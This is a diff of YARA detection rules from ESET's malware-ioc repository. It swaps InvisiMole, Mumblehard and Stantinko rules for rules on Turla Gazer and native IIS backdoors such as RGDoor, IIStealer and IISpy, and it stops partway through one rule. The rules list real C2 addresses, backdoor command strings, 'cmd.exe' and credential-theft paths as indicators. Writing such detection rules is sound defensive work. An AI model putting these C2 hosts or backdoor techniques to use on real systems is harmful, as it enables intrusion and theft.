-		uint16( 0 ) == 0x5a4d and pe.number_of_resources >= 6 and for 5 resource in pe.resources : ( resource.type == 10 and resource.language == 1033 and ( resource.name_string == "1\x000\x000\x000\x000\x00" or resource.name_string == "1\x000\x000\x000\x001\x00" or resource.name_string == "1\x000\x000\x000\x002\x00" or resource.name_string == "1\x000\x000\x000\x003\x00" or resource.name_string == "1\x000\x000\x000\x004\x00" or resource.name_string == "1\x000\x000\x000\x005\x00" or resource.name_string == "1\x000\x001\x000\x000\x00" ) )
+		(pe.exports ( "install" ) or pe.exports ( "Install" ) ) and pe.exports ( "TBP_Initialize" ) and pe.exports ( "TBP_Finalize" ) and pe.exports ( "TBP_GetName" ) and pe.exports ( "DllRegisterServer" ) and pe.exports ( "DllGetClassObject" )
 }
-rule ESET_Apt_Windows_Invisimole_Logs : FILE
+
+rule ESET_Gazer_Certificate_Subject
 {
 	meta:
-		description = "Detects log files with collected created by InvisiMole's RC2CL backdoor"
+		description = "Turla Gazer malware"
 		author = "ESET Research"
-		id = "151883ad-1f44-55b4-b12a-f0d399527189"
-		date = "2021-05-17"
-		modified = "2021-05-17"
+		id = "a7719333-b341-538c-a8ed-5c50b653a765"
+		date = "2017-08-30"
+		modified = "2017-08-29"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/invisimole/invisimole.yar#L54-L77"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/turla/gazer.yar#L33-L46"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "d42423ccc768f1823c76d5cb2aec26434c796fc35bd4e2fbf435fcf7997d3ff0"
+		logic_hash = "6e870c9cdcee33769162de62ea143ff401af50b22a63d2f212c44d06f5771dec"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
+		contact = "github@eset.com"
 		license = "BSD 2-Clause"
-		version = "1"
 
 	condition:
-		uint32( 0 ) == 0x08F1CAA1 or uint32( 0 ) == 0x08F1CAA2 or uint32( 0 ) == 0x08F1CCC0 or uint32( 0 ) == 0x08F2AFC0 or uint32( 0 ) == 0x083AE4DF or uint32( 0 ) == 0x18F2CBB1 or uint32( 0 ) == 0x1900ABBA or uint32( 0 ) == 0x24F2CEA1 or uint32( 0 ) == 0xDA012193 or uint32( 0 ) == 0xDA018993 or uint32( 0 ) == 0xDA018995 or uint32( 0 ) == 0xDD018991
+		for any i in ( 0 .. pe.number_of_signatures - 1 ) : ( pe.signatures [ i ] . subject contains "Solid Loop" or pe.signatures [ i ] . subject contains "Ultimate Computer Support" )
 }
-rule ESET_Apt_Windows_Invisimole_SFX_Dropper : FILE
+rule ESET_Gazer_Certificate : FILE
 {
 	meta:
-		description = "Detects trojanized InvisiMole files: patched RAR SFX droppers with added InvisiMole blobs (config encrypted XOR 2A at the end of a file)"
+		description = "Turla Gazer malware"
 		author = "ESET Research"
-		id = "08490bcd-3139-5fac-9c6c-5a32acb7217a"
-		date = "2021-05-17"
-		modified = "2021-05-17"
+		id = "e90bbe53-4e7f-59c4-a505-4893150bf824"
+		date = "2017-08-30"
+		modified = "2017-08-29"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/invisimole/invisimole.yar#L79-L95"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/turla/gazer.yar#L48-L65"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "6ca248d42c1e889988e5931d80df071cb20e623fb0c4a208044cabe073f71ce4"
+		logic_hash = "eb3afbaefd23d4fc6ded494d3378dc910a0832b160e733ab79c590128dd74cea"
 		score = 75
 		quality = 80
 		tags = "FILE"
+		contact = "github@eset.com"
 		license = "BSD 2-Clause"
-		version = "1"
 
 	strings:
-		$encrypted_config = {5F 59 4F 58 19 18 04 4E 46 46 2A 5D 59 5A 58 43 44 5E 4C 7D 2A 0F 2A 59 2A 78 2A 4B 2A 58 2A 0E 2A 6F 2A 72 2A 4B 2A 0F 2A 4E 2A 04 2A 0F 2A 4E 2A 76 2A 0F 2A 79 2A 2A 2A 79 42 4F 46 46 6F 52 4F 49 5F 5E 4F 7D 2A 79 42 4F 46 46 19 18 04 4E 46 46 2A 7C 43 58 5E 5F 4B 46 6B 46 46 45 49 2A 66 45 4B 4E 66 43 48 58 4B 58 53 6B}
+		$certif1 = {52 76 a4 53 cd 70 9c 18 da 65 15 7e 5f 1f de 02}
+		$certif2 = {12 90 f2 41 d9 b2 80 af 77 fc da 12 c6 b4 96 9c}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $encrypted_config
+		( uint16( 0 ) == 0x5a4d ) and 1 of them and filesize < 2MB
 }
-rule ESET_Apt_Windows_Invisimole_CPL_Loader : FILE
+rule ESET_Gazer_Logfile_Name : FILE
 {
 	meta:
-		description = "CPL loader"
+		description = "Turla Gazer malware"
 		author = "ESET Research"
-		id = "feff8627-6085-5835-ac1b-d4522245f7db"
-		date = "2021-05-17"
-		modified = "2021-05-17"
+		id = "3e1454e9-dddf-5197-b486-b96d725fdb58"
+		date = "2017-08-30"
+		modified = "2017-08-29"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/invisimole/invisimole.yar#L97-L118"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/turla/gazer.yar#L67-L85"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "cd5c19e14faa7fd3758b30193ccf2bed3692ad29d8216466523ca25d2abcfe88"
+		logic_hash = "b50553f4b4b07f124e5bd390e7dc8ac6b60a8ef185f3bc227894f957d6483478"
 		score = 75
 		quality = 80
 		tags = "FILE"
+		contact = "github@eset.com"
 		license = "BSD 2-Clause"
-		version = "1"
 
 	strings:
-		$s1 = "WScr%steObject(\"WScr%s.Run(\"::{20d04fe0-3a%s30309d}\\\\::{21EC%sDD-08002B3030%s\", 0);"
-		$s2 = "\\Control.js" wide
-		$s3 = "\\Control Panel.lnk" wide
-		$s4 = "FPC 3.0.4 [2019/04/13] for x86_64 - Win64"
-		$s5 = "FPC 3.0.4 [2019/04/13] for i386 - Win32"
-		$s6 = "imageapplet.dat" wide
-		$s7 = "wkssvmtx"
+		$s1 = "CVRG72B5.tmp.cvr"
+		$s2 = "CVRG1A6B.tmp.cvr"
+		$s3 = "CVRG38D9.tmp.cvr"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 3 of them )
+		( uint16( 0 ) == 0x5a4d ) and 1 of them
 }
-
-rule ESET_Apt_Windows_Invisimole_Wrapper_DLL
+rule ESET_IIS_Group02
 {
 	meta:
-		description = "Detects InvisiMole wrapper DLL with embedded RC2CL and RC2FM backdoors, by export and resource names"
+		description = "Detects Group 2 native IIS malware family"
 		author = "ESET Research"
-		id = "b9609b09-3ef5-5793-a3aa-4692cec367d9"
-		date = "2021-05-17"
-		modified = "2021-05-17"
+		id = "945e3748-1072-55f3-abaa-903dfc250294"
+		date = "2021-08-04"
+		modified = "2021-08-04"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/invisimole/invisimole.yar#L120-L138"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L134-L155"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "156bc5bc7b0ed5c77a5a15e7799a3077d40150896476a60935cf21a9afe36856"
+		logic_hash = "3fa2b8fed3c580f446b55412a920a5cfed2317b06aa93d059e9f89fdbec8f683"
 		score = 75
-		quality = 80
+		quality = 76
 		tags = ""
 		license = "BSD 2-Clause"
 		version = "1"
 
+	strings:
+		$s1 = "HttpModule.pdb" ascii wide
+		$s2 = "([\\w+%]+)=([^&]*)"
+		$s3 = "([\\w+%]+)=([^!]*)"
+		$s4 = "cmd.exe"
+		$s5 = "C:\\Users\\Iso\\Documents\\Visual Studio 2013\\Projects\\IIS 5\\x64\\Release\\Vi.pdb" ascii wide
+		$s6 = "AVRSAFunction"
+
 	condition:
-		pe.exports( "GetDataLength" ) and for any y in ( 0 .. pe.number_of_resources - 1 ) : ( pe.resources [ y ] . type == pe.RESOURCE_TYPE_RCDATA and pe.resources [ y ] . name_string == "R\x00C\x002\x00C\x00L\x00" ) and for any y in ( 0 .. pe.number_of_resources - 1 ) : ( pe.resources [ y ] . type == pe.RESOURCE_TYPE_RCDATA and pe.resources [ y ] . name_string == "R\x00C\x002\x00F\x00M\x00" )
+		ESET_IIS_Native_Module_PRIVATE and 3 of ( $s* )
 }
-rule ESET_Apt_Windows_Invisimole_DNS_Downloader : FILE
+rule ESET_IIS_Group03
 {
 	meta:
-		description = "InvisiMole DNS downloader"
+		description = "Detects Group 3 native IIS malware family"
 		author = "ESET Research"
-		id = "1caa6c8b-3798-556e-835e-885b7f3f4511"
-		date = "2021-05-17"
-		modified = "2021-05-17"
+		id = "9caf9b3e-611e-5e0e-a7ee-9e7515679022"
+		date = "2021-08-04"
+		modified = "2021-08-04"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/invisimole/invisimole.yar#L140-L170"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L157-L176"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "88d6ed7ec1331153d19afc18473a4be2b214ad8af29fcf7051a2a8e40e088231"
+		logic_hash = "d811c2ac610780bf968e86e8fd302cffc9434902e547399d06fdeb30d1719f51"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		license = "BSD 2-Clause"
 		version = "1"
 
 	strings:
-		$d = "DnsQuery_A"
-		$s1 = "Wireshark-is-running-{9CA78EEA-EA4D-4490-9240-FC01FCEF464B}" xor
-		$s2 = "AddIns\\" ascii wide xor
-		$s3 = "pcornomeex." xor
-		$s4 = "weriahsek.rxe" xor
-		$s5 = "dpmupaceex." xor
-		$s6 = "TCPViewClass" xor
-		$s7 = "PROCMON_WINDOW_CLASS" xor
-		$s8 = "Key%C"
-		$s9 = "AutoEx%C" xor
-		$s10 = "MSO~"
-		$s11 = "MDE~"
-		$s12 = "DNS PLUGIN, Step %d" xor
-		$s13 = "rundll32.exe \"%s\",StartUI"
+		$s1 = "IIS-Backdoor.dll"
+		$s2 = "CryptStringToBinaryA"
+		$s3 = "CreateProcessA"
+		$s4 = "X-Cookie"
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D ) or ESET_Invisimole_Blob_PRIVATE ) and $d and 5 of ( $s* )
+		ESET_IIS_Native_Module_PRIVATE and 3 of ( $s* )
 }
-rule ESET_Apt_Windows_Invisimole_RC2CL_Backdoor : FILE
+rule ESET_IIS_Group04_Rgdoor
 {
 	meta:
-		description = "InvisiMole RC2CL backdoor"
+		description = "Detects Group 4 native IIS malware family (RGDoor)"
 		author = "ESET Research"
-		id = "0228b8ee-bf03-504e-8cdf-8a1c9a79d54e"
-		date = "2021-05-17"
-		modified = "2021-05-17"
+		id = "64a0e664-a4d9-555b-a11b-5f7d9d0678b1"
+		date = "2021-08-04"
+		modified = "2021-08-04"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/invisimole/invisimole.yar#L172-L213"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L178-L199"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "c38550023515d33eaaf0669cc8b874bcfd09653a07c7edbf72e3344d1cf31541"
+		logic_hash = "be615dc0cc8bf0fd52cc5a88a3759c1cb1cd18703de74d16f5cce3eabccf91c6"
 		score = 75
-		quality = 78
-		tags = "FILE"
+		quality = 80
+		tags = ""
 		license = "BSD 2-Clause"
 		version = "1"
 
 	strings:
-		$s1 = "RC2CL" wide
-		$s2 = "hp12KsNh92Dwd" wide
-		$s3 = "ZLib package %s: files: %d, total size: %d" wide
-		$s4 = "\\Un4seen" wide
-		$s5 = {9E 01 3A AD}
-		$s6 = "~mrc_" wide
-		$s7 = "~src_" wide
-		$s8 = "~wbc_" wide
-		$s9 = "zdf_" wide
-		$s10 = "~S0PM" wide
-		$s11 = "~A0FM" wide
-		$s12 = "~70Z63\\" wide
-		$s13 = "~E070C" wide
-		$s14 = "~N031E" wide
-		$s15 = "%szdf_%s.data" wide
-		$s16 = "%spicture.crd" wide
-		$s17 = "%s70zf_%s.cab" wide
-		$s18 = "%spreview.crd" wide
-		$s19 = "Value_Bck" wide
-		$s20 = "Value_WSFX_ZC" wide
-		$s21 = "MachineAccessStateData" wide
-		$s22 = "SettingsSR2" wide
+		$i1 = "RGSESSIONID="
+		$s2 = "upload$"
+		$s3 = "download$"
+		$s4 = "cmd$"
+		$s5 = "cmd.exe"
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D ) or ESET_Invisimole_Blob_PRIVATE ) and 5 of ( $s* )
+		ESET_IIS_Native_Module_PRIVATE and ( $i1 or all of ( $s* ) )
 }
-rule ESET_Apt_Windows_Invisimole : FILE
+rule ESET_IIS_Group05_Iistealer
 {
 	meta:
-		description = "InvisiMole magic values, keys and strings"
+		description = "Detects Group 5 native IIS malware family (IIStealer)"
 		author = "ESET Research"
-		id = "4d48996b-9792-57ba-a302-349220323712"
-		date = "2021-05-17"
-		modified = "2021-05-17"
+		id = "598ec6b2-0349-5da7-acad-72ef2468b927"
+		date = "2021-08-04"
+		modified = "2021-08-04"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/invisimole/invisimole.yar#L215-L255"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L201-L232"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "7a2cff9febe77d718089ba4e1a33f3487594588892e418cec685bf22b156fa2b"
+		logic_hash = "5dff445121fda59df805d6fcb5db3f8f8e52a6e63e2da2a6875f8c9ad9cafc72"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		license = "BSD 2-Clause"
 		version = "1"
 
 	strings:
-		$s1 = "CryptProtectData"
-		$s2 = "CryptUnprotectData"
-		$s3 = {9E 01 3A AD}
-		$s4 = "GET /getversion2a/%d%.2X%.2X/U%sN HTTP/1.1"
-		$s5 = "PULSAR_LOADER.dll"
-		$check_magic_old_32 = {3? F9 FF D0 DE}
-		$check_magic_old_64 = {3? 64 FF D0 DE}
-		$check_magic_new_32 = {81 3? 86 DA 11 CE}
-		$check_magic_new_64 = {81 3? 64 DA 11 CE}
+		$s1 = "tojLrGzFMbcDTKcH" ascii wide
+		$s2 = "4vUOj3IutgtrpVwh" ascii wide
+		$s3 = "SoUnRCxgREXMu9bM" ascii wide
+		$s4 = "9Zr1Z78OkgaXj1Xr" ascii wide
+		$s5 = "cache.txt" ascii wide
+		$s6 = "/checkout/checkout.aspx" ascii wide
+		$s7 = "/checkout/Payment.aspx" ascii wide
+		$s8 = "/privacy.aspx"
+		$s9 = "X-IIS-Data"
+		$s10 = "POST"
+		$s11 = {C7 ?? CF 2F 00 63 00 C7 ?? D3 68 00 65 00 C7 ?? D7 63 00 6B 00 C7 ?? DB 6F 00 75 00 C7 ?? DF 74 00 2F 00 C7 ?? E3 63 00 68 00 C7 ?? E7 65 00 63 00 C7 ?? EB 6B 00 6F 00 C7 ?? EF 75 00 74 00 C7 ?? F3 2E 00 61 00 C7 ?? F7 73 00 70 00 C7 ?? FB 78 00 00 00}
+		$s12 = {C7 ?? AF 2F 00 70 00 C7 ?? B3 72 00 69 00 C7 ?? B7 76 00 61 00 C7 ?? BB 63 00 79 00 C7 ?? BF 2E 00 61 00 C7 ?? C3 73 00 70 00 C7 ?? C7 78 00 00 00}
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D ) or ESET_Invisimole_Blob_PRIVATE ) and ( any of ( $check_magic* ) ) and ( 2 of ( $s* ) )
+		ESET_IIS_Native_Module_PRIVATE and 3 of ( $s* )
 }
-rule ESET_Apt_Windows_Invisimole_C2 : FILE
+rule ESET_IIS_Group06_ISN
 {
 	meta:
-		description = "InvisiMole C&C servers"
+		description = "Detects Group 6 native IIS malware family (ISN)"
 		author = "ESET Research"
-		id = "9279c8cd-2c16-5f90-a7f5-e668d57c805b"
-		date = "2021-05-17"
-		modified = "2021-05-17"
+		id = "1f68fc42-61a3-5a7d-9daa-31ae3b561837"
+		date = "2021-08-04"
+		modified = "2021-08-04"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/invisimole/invisimole.yar#L257-L297"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L234-L259"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "aff8456ce7a9ebe875c02e51c09b77ee7b1fddfc11d4ad236e12c8c5240a01a8"
+		logic_hash = "2f59034a642a9b92fc88922433cd5923be02332159cba5e16d99d9523ed43205"
 		score = 75
-		quality = 78
-		tags = "FILE"
+		quality = 80
+		tags = ""
 		license = "BSD 2-Clause"
 		version = "1"
 
 	strings:
-		$s1 = "46.165.220.228" ascii wide
-		$s2 = "80.255.3.66" ascii wide
-		$s3 = "85.17.26.174" ascii wide
-		$s4 = "185.193.38.55" ascii wide
-		$s5 = "194.187.249.157" ascii wide
-		$s6 = "195.154.255.211" ascii wide
-		$s7 = "153.re" ascii wide fullword
-		$s8 = "adstat.red" ascii wide
-		$s9 = "adtrax.net" ascii wide
-		$s10 = "akamai.sytes.net" ascii wide
-		$s11 = "amz-eu401.com" ascii wide
-		$s12 = "blabla234342.sytes.net" ascii wide
-		$s13 = "mx1.be" ascii wide fullword
-		$s14 = "statad.de" ascii wide
-		$s15 = "time.servehttp.com" ascii wide
-		$s16 = "upd.re" ascii wide fullword
-		$s17 = "update.xn--6frz82g" ascii wide
-		$s18 = "updatecloud.sytes.net" ascii wide
-		$s19 = "updchecking.sytes.net" ascii wide
-		$s20 = "wlsts.net" ascii wide
-		$s21 = "ro2.host" ascii wide fullword
-		$s22 = "2ld.xyz" ascii wide fullword
-		$s23 = "the-haba.com" ascii wide
-		$s24 = "82.202.172.134" ascii wide
-		$s25 = "update.xn--6frz82g" ascii wide
+		$s1 = "isn7 config reloaded"
+		$s2 = "isn7 config NOT reloaded, not found or empty"
+		$s3 = "isn7 log deleted"
+		$s4 = "isn7 log not deleted, ERROR 0x%X"
+		$s5 = "isn7 log NOT found"
+		$s6 = "isn_reloadconfig"
+		$s7 = "D:\\soft\\Programming\\C++\\projects\\isapi\\isn7"
+		$s8 = "get POST failed %d"
+		$s9 = "isn7.dll"
 
 	condition:
-		(( uint16( 0 ) == 0x5A4D ) or ESET_Invisimole_Blob_PRIVATE ) and $s21 and any of them
+		ESET_IIS_Native_Module_PRIVATE and 3 of ( $s* )
 }
-rule ESET_Mumblehard_Packer
+rule ESET_IIS_Group07_Iispy
 {
 	meta:
-		description = "Mumblehard i386 assembly code responsible for decrypting Perl code"
-		author = "Marc-Etienne M.Léveillé"
-		id = "981c18e3-ac28-54f5-97ab-44b1d12a1389"
-		date = "2015-04-07"
-		modified = "2015-05-01"
-		reference = "http://www.welivesecurity.com"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/mumblehard/mumblehard_packer.yar#L32-L47"
+		description = "Detects Group 7 native IIS malware family (IISpy)"
+		author = "ESET Research"
+		id = "64ed0189-a0be-5592-b9c6-1622700a7ed7"
+		date = "2021-08-04"
+		modified = "2021-08-04"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L261-L296"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "a04f50a7054c4ce8ad9be4e7f3373ad4f36eb9443e223601974e852c25603f5f"
+		logic_hash = "ec5db5f36d06f9b0bdfe598fc72431da35afc1473dcc29f437a0f48ea9835a03"
 		score = 75
 		quality = 80
 		tags = ""
+		license = "BSD 2-Clause"
 		version = "1"
 
 	strings:
-		$decrypt = { 31 db  [1-10]  ba ?? 00 00 00  [0-6]  (56 5f |  89 F7)
-                     39 d3 75 13 81 fa ?? 00 00 00 75 02 31 d2 81 c2 ?? 00 00
-                     00 31 db 43 ac 30 d8 aa 43 e2 e2 }
+		$s1 = "/credential/username"
+		$s2 = "/credential/password"
+		$s3 = "/computer/domain"
+		$s4 = "/computer/name"
+		$s5 = "/password"
+		$s6 = "/cmd"
+		$s7 = "%.8s%.8s=%.8s%.16s%.8s%.16s"
+		$s8 = "ImpersonateLoggedOnUser"
+		$s9 = "WNetAddConnection2W"
+		$t1 = "X-Forwarded-Proto"
+		$t2 = "Sec-Fetch-Mode"
+		$t3 = "Sec-Fetch-Site"
+		$t4 = "Cookie"
+		$t5 = {49 45 4E 44 AE 42 60 82}
+		$t6 = {89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52}
 
 	condition:
-		$decrypt
+		ESET_IIS_Native_Module_PRIVATE and 2 of ( $s* ) and any of ( $t* )
 }
-
-rule ESET_Beds_Plugin
+rule ESET_IIS_Group08
 {
 	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "7c038e92-1064-503e-9d63-2d2c10f1759e"
-		date = "2017-07-17"
-		modified = "2017-07-20"
+		description = "Detects Group 8 native IIS malware family"
+		author = "ESET Research"
+		id = "d0e9a5ec-b7f0-5d3f-93b4-d048503eb210"
+		date = "2021-08-04"
+		modified = "2021-08-04"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/stantinko/stantinko.yar#L34-L51"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L298-L337"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "024cb91288f133e4cdf5993ac0477de6de76d38fa06f7affa348c6a28a4600da"
+		logic_hash = "d5826d454d25ecbbb5da464da974023a247517d873cf10dc0eafa91e185451da"
 		score = 75
-		quality = 80
+		quality = 53
 		tags = ""
-		Author = "Frédéric Vachon"
-		Description = "Stantinko BEDS' plugins"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
-
-	condition:
-		pe.exports( "CheckDLLStatus" ) and pe.exports ( "GetPluginData" ) and pe.exports ( "InitializePlugin" ) and pe.exports ( "IsReleased" ) and pe.exports ( "ReleaseDLL" )
-}
+		license = "BSD 2-Clause"
+		version = "1"
 
-rule ESET_Beds_Dropper
-{
-	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "47ccab59-253f-55d4-b38a-4441802626fc"
-		date = "2017-07-17"
-		modified = "2017-07-20"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/stantinko/stantinko.yar#L53-L67"
-		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "4b5d121e182e3fddd766a7a1227c5de273995e9336156e7a6e8a17faad681bea"
-		score = 75
-		quality = 80
-		tags = ""
-		Author = "Frédéric Vachon"
-		Description = "BEDS dropper"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
+	strings:
+		$i1 = "FliterSecurity.dll"
+		$i2 = "IIS7NativeModule.dll"
+		$i3 = "Ver1.0."
+		$s1 = "Cmd"
+		$s2 = "Realy path : %s"
+		$s3 = "Logged On Users : %d"
+		$s4 = "Connect OK!"
+		$s5 = "You are fucked!"
+		$s6 = "Shit!Error"
+		$s7 = "Where is the God!!"
+		$s8 = "Shit!Download False!"
+		$s9 = "Good!Run OK!"
+		$s10 = "Shit!Run False!"
+		$s11 = "Good!Download OK!"
+		$s12 = "[%d]safedog"
+		$s13 = "ed81bfc09d069121"
+		$s14 = "a9478ef01967d190"
+		$s15 = "af964b7479e5aea2"
+		$s16 = "1f9e6526bea65b59"
+		$s17 = "2b9e9de34f782d31"
+		$s18 = "33cc5da72ac9d7bb"
+		$s19 = "b1d71f4c2596cd55"
+		$s20 = "101fb9d9e86d9e6c"
 
 	condition:
-		pe.imphash( ) == "a7ead4ef90d9981e25728e824a1ba3ef"
+		ESET_IIS_Native_Module_PRIVATE and 1 of ( $i* ) and 3 of ( $s* )
 }
-rule ESET_Facebook_Bot : FILE
+rule ESET_IIS_Group09
 {
 	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "643b137f-af79-584c-8266-f2335a79f1ba"
-		date = "2017-07-17"
-		modified = "2017-07-20"
+		description = "Detects Group 9 native IIS malware family"
+		author = "ESET Research"
+		id = "69d176bc-73b1-5c4d-bb7e-463d26e8e6a9"
+		date = "2021-08-04"
+		modified = "2021-08-04"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/stantinko/stantinko.yar#L69-L100"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L339-L387"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "8ea779f90fa6080398403e3e6f9d342360c35e93c756ed43cb699f090106504e"
+		logic_hash = "5f89f9488221b8db8d493b3c23b7f5edd957c15511148eca890558886c128192"
 		score = 75
-		quality = 55
-		tags = "FILE"
-		Author = "Frédéric Vachon"
-		Description = "Stantinko's Facebook bot"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
+		quality = 76
+		tags = ""
+		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$s1 = "m_upload_pic&return_uri=https%3A%2F%2Fm.facebook.com%2Fprofile.php" fullword ascii
-		$s2 = "D:\\work\\brut\\cms\\facebook\\facebookbot\\Release\\facebookbot.pdb" fullword ascii
-		$s3 = "https%3A%2F%2Fm.facebook.com%2Fcomment%2Freplies%2F%3Fctoken%3D" fullword ascii
-		$s4 = "reg_fb_gate=https%3A%2F%2Fm.facebook.com%2Freg" fullword ascii
-		$s5 = "reg_fb_ref=https%3A%2F%2Fm.facebook.com%2Freg%2F" fullword ascii
-		$s6 = "&return_uri_error=https%3A%2F%2Fm.facebook.com%2Fprofile.php" fullword ascii
-		$x1 = "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36" fullword ascii
-		$x2 = "registration@facebookmail.com" fullword ascii
-		$x3 = "https://m.facebook.com/profile.php?mds=" fullword ascii
-		$x4 = "https://upload.facebook.com/_mupload_/composer/?profile&domain=" fullword ascii
-		$x5 = "http://staticxx.facebook.com/connect/xd_arbiter.php?version=42#cb=ff43b202c" fullword ascii
-		$x6 = "https://upload.facebook.com/_mupload_/photo/x/saveunpublished/" fullword ascii
-		$x7 = "m.facebook.com&ref=m_upload_pic&waterfall_source=" fullword ascii
-		$x8 = "payload.commentID" fullword ascii
-		$x9 = "profile.login" fullword ascii
+		$i1 = "FliterSecurity.dll"
+		$i2 = {56565656565656565656565656565656}
+		$i3 = "app|hot|alp|svf|fkj|mry|poc|doc|20" xor
+		$i4 = "yisouspider|yisou|soso|sogou|m.sogou|sogo|sogou|so.com|baidu|bing|360" xor
+		$i5 = "baidu|m.baidu|soso|sogou|m.sogou|sogo|sogou|so.com|google|youdao" xor
+		$i6 = "118|abc|1go|evk" xor
+		$s1 = "AVCFuckHttpModuleFactory"
+		$s2 = "X-Forward"
+		$s3 = "fuck32.dat"
+		$s4 = "fuck64.dat"
+		$s5 = "&ipzz1="
+		$s6 = "&ipzz2="
+		$s7 = "&uuu="
+		$s8 = "http://20.3323sf.c" xor
+		$s9 = "http://bj.whtjz.c" xor
+		$s10 = "http://bj2.wzrpx.c" xor
+		$s11 = "http://cs.whtjz.c" xor
+		$s12 = "http://df.e652.c" xor
+		$s13 = "http://dfcp.yyphw.c" xor
+		$s14 = "http://es.csdsx.c" xor
+		$s15 = "http://hz.wzrpx.c" xor
+		$s16 = "http://id.3323sf.c" xor
